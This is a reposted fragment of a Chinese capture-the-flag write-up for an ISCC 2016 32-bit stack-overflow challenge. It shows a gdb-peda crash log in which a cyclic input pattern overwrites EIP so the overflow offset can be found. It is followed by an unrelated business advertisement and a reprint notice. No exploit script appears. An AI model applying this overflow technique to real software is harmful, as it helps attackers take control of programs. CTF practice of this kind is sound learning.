一.pwn1 简单的32位栈溢出,定位溢出点后即可写expgdb-peda$ rStarting program: /usr/iscc/pwn1 Cmon pwn me : AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0 ...
一.pwn1
简单的32位栈溢出,定位溢出点后即可写exp
gdb-peda$ rStarting program: /usr/iscc/pwn1 C'mon pwn me : AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%Program received signal SIGSEGV, Segmentation fault.[----------------------------------registers-----------------------------------]EAX: 0x41632541 ('A%cA')EBX: 0xb7fb6000 --> 0x1a5da8 ECX: 0xb7fb7884 --> 0x0 EDX: 0x1 ESI: 0x0 EDI: 0x0 EBP: 0xbffff478 --> 0x0 ESP: 0xbffff45c --> 0x8048607 (mov eax,0x0)EIP: 0x41632541 ('A%cA')EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)[-------------------------------------code-------------------------------------]Invalid $PC address: 0x41632541[------------------------------------stack-------------------------------------]0000| 0xbffff45c --> 0x8048607 (mov eax,0x0)0004| 0xbffff460 --> 0x80486c1 --> 0x1007325 0008| 0xbffff464 --> 0x804a060 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA"...)0012| 0xbffff468 --> 0x804861b (add ebx,0x19b9)0016| 0xbffff46c --> 0xb7fb6000 --> 0x1a5da8 0020| 0xbffff470 --> 0x8048610 (push ebp)0024| 0xbffff474 --> 0x0 0028| 0xbffff478 --> 0x0 [------------------------------------------------------------------------------]Legend: code, data, rodata, valueStopped reason: SIGSEGV0x41632541 in ?? ()
海外公司注册、海外银行开户、跨境平台代入驻、VAT、EPR等知识和在线办理:https://www.xlkjsw.com
原标题:iscc2016 pwn部分writeup
关键词:
*特别声明:以上内容来自于网络收集,著作权属原作者所有,如有侵权,请联系我们:
admin#shaoqun.com
(#换成@)。
